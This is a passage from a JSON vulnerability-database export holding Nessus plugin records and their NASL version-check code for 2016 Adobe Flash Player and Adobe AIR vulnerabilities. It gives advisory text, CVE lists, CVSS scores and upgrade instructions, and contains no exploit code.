"AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2022-05-18T15:28:04", "description": "The remote host is affected by the vulnerability described in GLSA-201606-08 (Adobe Flash Player: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Adobe Flash Player.\n Please review the CVE identifiers referenced below for details.\n Impact :\n\n A remote attacker could possibly execute arbitrary code with the privileges of the process, cause a Denial of Service condition, obtain sensitive information, or bypass security restrictions.\n Workaround :\n\n There is no known workaround at this time.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-06-20T00:00:00", "type": "nessus", "title": "GLSA-201606-08 : Adobe Flash Player: Multiple vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1019", "CVE-2016-4117", "CVE-2016-4120", "CVE-2016-4121", "CVE-2016-4160", "CVE-2016-4161", "CVE-2016-4162", "CVE-2016-4163", "CVE-2016-4171"], "modified": "2022-03-28T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:adobe-flash", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-201606-08.NASL", "href": "https://www.tenable.com/plugins/nessus/91702", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201606-08.\n#\n# The advisory text is Copyright (C) 2001-2019 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(91702);\n script_version(\"2.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/28\");\n\n script_cve_id(\n \"CVE-2016-1019\",\n \"CVE-2016-4117\",\n \"CVE-2016-4120\",\n \"CVE-2016-4121\",\n \"CVE-2016-4160\",\n \"CVE-2016-4161\",\n \"CVE-2016-4162\",\n \"CVE-2016-4163\",\n \"CVE-2016-4171\"\n );\n script_xref(name:\"GLSA\", value:\"201606-08\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/24\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/15\");\n\n script_name(english:\"GLSA-201606-08 : Adobe Flash Player: Multiple vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is affected by the vulnerability described in GLSA-201606-08\n(Adobe Flash Player: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Adobe Flash Player.\n Please review the CVE identifiers referenced below for details.\n \nImpact :\n\n A remote attacker could possibly execute arbitrary code with the\n privileges of the process, cause a Denial of Service condition, obtain\n sensitive information, or bypass security restrictions.\n \nWorkaround :\n\n There is no known workaround at this time.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security.gentoo.org/glsa/201606-08\");\n script_set_attribute(attribute:\"solution\", value:\n\"All Adobe Flash Player users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose 'www-plugins/adobe-flash-11.2.202.626'\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player DeleteRangeTimelineOperation Type-Confusion');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/04/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/06/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/06/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:adobe-flash\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"www-plugins/adobe-flash\", unaffected:make_list(\"ge 11.2.202.626\"), vulnerable:make_list(\"lt 11.2.202.626\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Adobe Flash Player\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-18T15:13:45", "description": "This security update for flash-player to 11.2.202.621 fixes the following issues (boo#979422) :\n\nA critical vulnerability (CVE-2016-4117) exists in Adobe Flash Player 21.0.0.226 and earlier versions for Windows, Macintosh, Linux, and Chrome OS. Successful exploitation could cause a crash and potentially allow an attacker to take control of the affected system. (APSA16-02)\n\nhttps://helpx.adobe.com/security/products/flash-player/apsa16-02.html\n\nSome CVEs were not listed in the last submission :\n\n - APSA16-01, APSB16-10, CVE-2016-1006, CVE-2016-1011, CVE-2016-1012, CVE-2016-1013, CVE-2016-1014, CVE-2016-1015, CVE-2016-1016, CVE-2016-1017, CVE-2016-1018, CVE-2016-1019, CVE-2016-1020, CVE-2016-1021, CVE-2016-1022, CVE-2016-1023, CVE-2016-1024, CVE-2016-1025, CVE-2016-1026, CVE-2016-1027, CVE-2016-1028, CVE-2016-1029, CVE-2016-1030, CVE-2016-1031, CVE-2016-1032, CVE-2016-1033", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-05-17T00:00:00", "type": "nessus", "title": "openSUSE Security Update : flash-player (openSUSE-2016-585)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1006", "CVE-2016-1011", "CVE-2016-1012", "CVE-2016-1013", "CVE-2016-1014", "CVE-2016-1015", "CVE-2016-1016", "CVE-2016-1017", "CVE-2016-1018", "CVE-2016-1019", "CVE-2016-1020", "CVE-2016-1021", "CVE-2016-1022", "CVE-2016-1023", "CVE-2016-1024", "CVE-2016-1025", "CVE-2016-1026", "CVE-2016-1027", "CVE-2016-1028", "CVE-2016-1029", "CVE-2016-1030", "CVE-2016-1031", "CVE-2016-1032", "CVE-2016-1033", "CVE-2016-4117"], "modified": "2022-03-08T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:flash-player", "p-cpe:/a:novell:opensuse:flash-player-gnome", "p-cpe:/a:novell:opensuse:flash-player-kde4", "cpe:/o:novell:opensuse:13.2"], "id": "OPENSUSE-2016-585.NASL", "href": "https://www.tenable.com/plugins/nessus/91178", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2016-585.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(91178);\n script_version(\"2.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/08\");\n\n script_cve_id(\n \"CVE-2016-1006\",\n \"CVE-2016-1011\",\n \"CVE-2016-1012\",\n \"CVE-2016-1013\",\n \"CVE-2016-1014\",\n \"CVE-2016-1015\",\n \"CVE-2016-1016\",\n \"CVE-2016-1017\",\n \"CVE-2016-1018\",\n \"CVE-2016-1019\",\n \"CVE-2016-1020\",\n \"CVE-2016-1021\",\n \"CVE-2016-1022\",\n \"CVE-2016-1023\",\n \"CVE-2016-1024\",\n \"CVE-2016-1025\",\n \"CVE-2016-1026\",\n \"CVE-2016-1027\",\n \"CVE-2016-1028\",\n \"CVE-2016-1029\",\n \"CVE-2016-1030\",\n \"CVE-2016-1031\",\n \"CVE-2016-1032\",\n \"CVE-2016-1033\",\n \"CVE-2016-4117\"\n );\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/24\");\n\n script_name(english:\"openSUSE Security Update : flash-player (openSUSE-2016-585)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote openSUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"This security update for flash-player to 11.2.202.621 fixes the\nfollowing issues (boo#979422) :\n\nA critical vulnerability (CVE-2016-4117) exists in Adobe Flash Player\n21.0.0.226 and earlier versions for Windows, Macintosh, Linux, and\nChrome OS. Successful exploitation could cause a crash and potentially\nallow an attacker to take control of the affected system. (APSA16-02)\n\nhttps://helpx.adobe.com/security/products/flash-player/apsa16-02.html\n\nSome CVEs were not listed in the last submission :\n\n - APSA16-01, APSB16-10, CVE-2016-1006, CVE-2016-1011,\n CVE-2016-1012, CVE-2016-1013, CVE-2016-1014,\n CVE-2016-1015, CVE-2016-1016, CVE-2016-1017,\n CVE-2016-1018, CVE-2016-1019, CVE-2016-1020,\n CVE-2016-1021, CVE-2016-1022, CVE-2016-1023,\n CVE-2016-1024, CVE-2016-1025, CVE-2016-1026,\n CVE-2016-1027, CVE-2016-1028, CVE-2016-1029,\n CVE-2016-1030, CVE-2016-1031, CVE-2016-1032,\n CVE-2016-1033\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=979422\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsa16-02.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected flash-player packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player DeleteRangeTimelineOperation Type-Confusion');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/04/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/05/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/05/17\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:flash-player\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:flash-player-gnome\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:flash-player-kde4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.2\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE13\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"13.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE13.2\", reference:\"flash-player-11.2.202.621-2.97.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"flash-player-gnome-11.2.202.621-2.97.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"flash-player-kde4-11.2.202.621-2.97.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"flash-player / flash-player-gnome / flash-player-kde4\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-18T15:13:45", "description": "The version of Adobe AIR installed on the remote Windows host is prior or equal to version 21.0.0.198. It is, therefore, affected by multiple vulnerabilities :\n\n - Multiple type confusion errors exist that allow an attacker to execute arbitrary code. (CVE-2016-1105, CVE-2016-4117)\n\n - Multiple use-after-free errors exist that allow an attacker to execute arbitrary code. (CVE-2016-1097, CVE-2016-1106, CVE-2016-1107, CVE-2016-1108, CVE-2016-1109, CVE-2016-1110, CVE-2016-4108, CVE-2016-4110, CVE-2016-4121)\n\n - A heap buffer overflow condition exists that allows an attacker to execute arbitrary code. (CVE-2016-1101)\n\n - An unspecified buffer overflow exists that allows an attacker to execute arbitrary code. (CVE-2016-1103)\n\n - Multiple memory corruption issues exist that allow an attacker to execute arbitrary code. (CVE-2016-1096, CVE-2016-1098, CVE-2016-1099, CVE-2016-1100, CVE-2016-1102, CVE-2016-1104, CVE-2016-4109, CVE-2016-4111, CVE-2016-4112, CVE-2016-4113, CVE-2016-4114, CVE-2016-4115, CVE-2016-4120, CVE-2016-4160, CVE-2016-4161, CVE-2016-4162, CVE-2016-4163)\n\n - A flaw exists when loading dynamic-link libraries. An attacker can exploit this, via a specially crafted .dll file, to execute arbitrary code. (CVE-2016-4116)", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-05-16T00:00:00", "type": "nessus", "title": "Adobe AIR <= 21.0.0.198 Multiple Vulnerabilities (APSB16-15)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1096", "CVE-2016-1097", "CVE-2016-1098", "CVE-2016-1099", "CVE-2016-1100", "CVE-2016-1101", "CVE-2016-1102", "CVE-2016-1103", "CVE-2016-1104", "CVE-2016-1105", "CVE-2016-1106", "CVE-2016-1107", "CVE-2016-1108", "CVE-2016-1109", "CVE-2016-1110", "CVE-2016-4108", "CVE-2016-4109", "CVE-2016-4110", "CVE-2016-4111", "CVE-2016-4112", "CVE-2016-4113", "CVE-2016-4114", "CVE-2016-4115", "CVE-2016-4116", "CVE-2016-4117", "CVE-2016-4120", "CVE-2016-4121", "CVE-2016-4160", "CVE-2016-4161", "CVE-2016-4162", "CVE-2016-4163"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:adobe:air"], "id": "ADOBE_AIR_APSB16-15.NASL", "href": "https://www.tenable.com/plugins/nessus/91162", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(91162);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\n \"CVE-2016-1096\",\n \"CVE-2016-1097\",\n \"CVE-2016-1098\",\n \"CVE-2016-1099\",\n \"CVE-2016-1100\",\n \"CVE-2016-1101\",\n \"CVE-2016-1102\",\n \"CVE-2016-1103\",\n \"CVE-2016-1104\",\n \"CVE-2016-1105\",\n \"CVE-2016-1106\",\n \"CVE-2016-1107\",\n \"CVE-2016-1108\",\n \"CVE-2016-1109\",\n \"CVE-2016-1110\",\n \"CVE-2016-4108\",\n \"CVE-2016-4109\",\n \"CVE-2016-4110\",\n \"CVE-2016-4111\",\n \"CVE-2016-4112\",\n \"CVE-2016-4113\",\n \"CVE-2016-4114\",\n \"CVE-2016-4115\",\n \"CVE-2016-4116\",\n \"CVE-2016-4117\",\n \"CVE-2016-4120\",\n \"CVE-2016-4121\",\n \"CVE-2016-4160\",\n \"CVE-2016-4161\",\n \"CVE-2016-4162\",\n \"CVE-2016-4163\"\n );\n script_bugtraq_id(90505);\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/24\");\n\n script_name(english:\"Adobe AIR <= 21.0.0.198 Multiple Vulnerabilities (APSB16-15)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host has a browser plugin installed that is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Adobe AIR installed on the remote Windows host is prior\nor equal to version 21.0.0.198. It is, therefore, affected by multiple\nvulnerabilities :\n\n - Multiple type confusion errors exist that allow an\n attacker to execute arbitrary code. (CVE-2016-1105,\n CVE-2016-4117)\n\n - Multiple use-after-free errors exist that allow an\n attacker to execute arbitrary code. (CVE-2016-1097,\n CVE-2016-1106, CVE-2016-1107, CVE-2016-1108,\n CVE-2016-1109, CVE-2016-1110, CVE-2016-4108,\n CVE-2016-4110, CVE-2016-4121)\n\n - A heap buffer overflow condition exists that allows an\n attacker to execute arbitrary code. (CVE-2016-1101)\n\n - An unspecified buffer overflow exists that allows an\n attacker to execute arbitrary code. (CVE-2016-1103)\n\n - Multiple memory corruption issues exist that allow an\n attacker to execute arbitrary code. (CVE-2016-1096,\n CVE-2016-1098, CVE-2016-1099, CVE-2016-1100,\n CVE-2016-1102, CVE-2016-1104, CVE-2016-4109,\n CVE-2016-4111, CVE-2016-4112, CVE-2016-4113,\n CVE-2016-4114, CVE-2016-4115, CVE-2016-4120,\n CVE-2016-4160, CVE-2016-4161, CVE-2016-4162,\n CVE-2016-4163)\n\n - A flaw exists when loading dynamic-link libraries. An\n attacker can exploit this, via a specially crafted .dll\n file, to execute arbitrary code. (CVE-2016-4116)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb16-15.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe AIR version 21.0.0.215 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-4117\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player DeleteRangeTimelineOperation Type-Confusion');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/05/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/05/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/05/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:air\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"adobe_air_installed.nasl\");\n script_require_keys(\"SMB/Adobe_AIR/Version\", \"SMB/Adobe_AIR/Path\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nversion = get_kb_item_or_exit(\"SMB/Adobe_AIR/Version\");\npath = get_kb_item_or_exit(\"SMB/Adobe_AIR/Path\");\n\nversion_ui = get_kb_item(\"SMB/Adobe_AIR/Version_UI\");\nif (isnull(version_ui)) version_report = version;\nelse version_report = version_ui + ' (' + version + ')';\n\ncutoff_version = '21.0.0.198';\nfix = '21.0.0.215';\nfix_ui = '21.0';\n\nif (ver_compare(ver:version, fix:cutoff_version) <= 0)\n{\n port = get_kb_item(\"SMB/transport\");\n if (!port) port = 445;\n\n report =\n '\\n Path : ' + path +\n '\\n Installed version : ' + version_report +\n '\\n Fixed version : ' + fix_ui + \" (\" + fix + ')' +\n '\\n';\n security_report_v4(severity:SECURITY_HOLE, port:port, extra:report);\n exit(0);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, \"Adobe AIR\", version_report, path);\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-18T15:12:06", "description": "The version of Adobe Flash Player installed on the remote Windows host is equal or prior to 21.0.0.226. It is, therefore, affected by multiple vulnerabilities :\n\n - Multiple type confusion errors exist that allow an attacker to execute arbitrary code. (CVE-2016-1105, CVE-2016-4117)\n\n - Multiple use-after-free errors exist that allow an attacker to execute arbitrary code. (CVE-2016-1097, CVE-2016-1106, CVE-2016-1107, CVE-2016-1108, CVE-2016-1109, CVE-2016-1110, CVE-2016-4108, CVE-2016-4110, CVE-2016-4121)\n\n - A heap buffer overflow condition exists that allows an attacker to execute arbitrary code. (CVE-2016-1101)\n\n - An unspecified buffer overflow exists that allows an attacker to execute arbitrary code. (CVE-2016-1103)\n\n - Multiple memory corruption issues exist that allow an attacker to execute arbitrary code. (CVE-2016-1096, CVE-2016-1098, CVE-2016-1099, CVE-2016-1100, CVE-2016-1102, CVE-2016-1104, CVE-2016-4109, CVE-2016-4111, CVE-2016-4112, CVE-2016-4113, CVE-2016-4114, CVE-2016-4115, CVE-2016-4120, CVE-2016-4160, CVE-2016-4161, CVE-2016-4162, CVE-2016-4163)\n\n - A flaw exists when loading dynamic-link libraries. An attacker can exploit this, via a specially crafted .dll file, to execute arbitrary code. (CVE-2016-4116)", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-05-16T00:00:00", "type": "nessus", "title": "Adobe Flash Player <= 21.0.0.226 Multiple Vulnerabilities (APSB16-15)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1096", "CVE-2016-1097", "CVE-2016-1098", "CVE-2016-1099", "CVE-2016-1100", "CVE-2016-1101", "CVE-2016-1102", "CVE-2016-1103", "CVE-2016-1104", "CVE-2016-1105", "CVE-2016-1106", "CVE-2016-1107", "CVE-2016-1108", "CVE-2016-1109", "CVE-2016-1110", "CVE-2016-4108", "CVE-2016-4109", "CVE-2016-4110", "CVE-2016-4111", "CVE-2016-4112", "CVE-2016-4113", "CVE-2016-4114", "CVE-2016-4115", "CVE-2016-4116", "CVE-2016-4117", "CVE-2016-4120", "CVE-2016-4121", "CVE-2016-4160", "CVE-2016-4161", "CVE-2016-4162", "CVE-2016-4163"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:adobe:flash_player"], "id": "FLASH_PLAYER_APSB16-15.NASL", "href": "https://www.tenable.com/plugins/nessus/91163", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(91163);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\n \"CVE-2016-1096\",\n \"CVE-2016-1097\",\n \"CVE-2016-1098\",\n \"CVE-2016-1099\",\n \"CVE-2016-1100\",\n \"CVE-2016-1101\",\n \"CVE-2016-1102\",\n \"CVE-2016-1103\",\n \"CVE-2016-1104\",\n \"CVE-2016-1105\",\n \"CVE-2016-1106\",\n \"CVE-2016-1107\",\n \"CVE-2016-1108\",\n \"CVE-2016-1109\",\n \"CVE-2016-1110\",\n \"CVE-2016-4108\",\n \"CVE-2016-4109\",\n \"CVE-2016-4110\",\n \"CVE-2016-4111\",\n \"CVE-2016-4112\",\n \"CVE-2016-4113\",\n \"CVE-2016-4114\",\n \"CVE-2016-4115\",\n \"CVE-2016-4116\",\n \"CVE-2016-4117\",\n \"CVE-2016-4120\",\n \"CVE-2016-4121\",\n \"CVE-2016-4160\",\n \"CVE-2016-4161\",\n \"CVE-2016-4162\",\n \"CVE-2016-4163\"\n );\n script_bugtraq_id(90505);\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/24\");\n\n script_name(english:\"Adobe Flash Player <= 21.0.0.226 Multiple Vulnerabilities (APSB16-15)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host has a browser plugin installed that is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Adobe Flash Player installed on the remote Windows\nhost is equal or prior to 21.0.0.226. It is, therefore, affected by \nmultiple vulnerabilities :\n\n - Multiple type confusion errors exist that allow an\n attacker to execute arbitrary code. (CVE-2016-1105,\n CVE-2016-4117)\n\n - Multiple use-after-free errors exist that allow an\n attacker to execute arbitrary code. (CVE-2016-1097,\n CVE-2016-1106, CVE-2016-1107, CVE-2016-1108,\n CVE-2016-1109, CVE-2016-1110, CVE-2016-4108,\n CVE-2016-4110, CVE-2016-4121)\n\n - A heap buffer overflow condition exists that allows an\n attacker to execute arbitrary code. (CVE-2016-1101)\n\n - An unspecified buffer overflow exists that allows an\n attacker to execute arbitrary code. (CVE-2016-1103)\n\n - Multiple memory corruption issues exist that allow an\n attacker to execute arbitrary code. (CVE-2016-1096,\n CVE-2016-1098, CVE-2016-1099, CVE-2016-1100,\n CVE-2016-1102, CVE-2016-1104, CVE-2016-4109,\n CVE-2016-4111, CVE-2016-4112, CVE-2016-4113,\n CVE-2016-4114, CVE-2016-4115, CVE-2016-4120,\n CVE-2016-4160, CVE-2016-4161, CVE-2016-4162,\n CVE-2016-4163)\n\n - A flaw exists when loading dynamic-link libraries. An\n attacker can exploit this, via a specially crafted .dll\n file, to execute arbitrary code. (CVE-2016-4116)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb16-15.html\");\n # http://helpx.adobe.com/flash-player/kb/archived-flash-player-versions.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0cb17c10\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe Flash Player version 21.0.0.242 or later.\n\nAlternatively, Adobe has made version 18.0.0.352 available for those\ninstallations that cannot be upgraded to the latest version.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-4117\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player DeleteRangeTimelineOperation Type-Confusion');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", 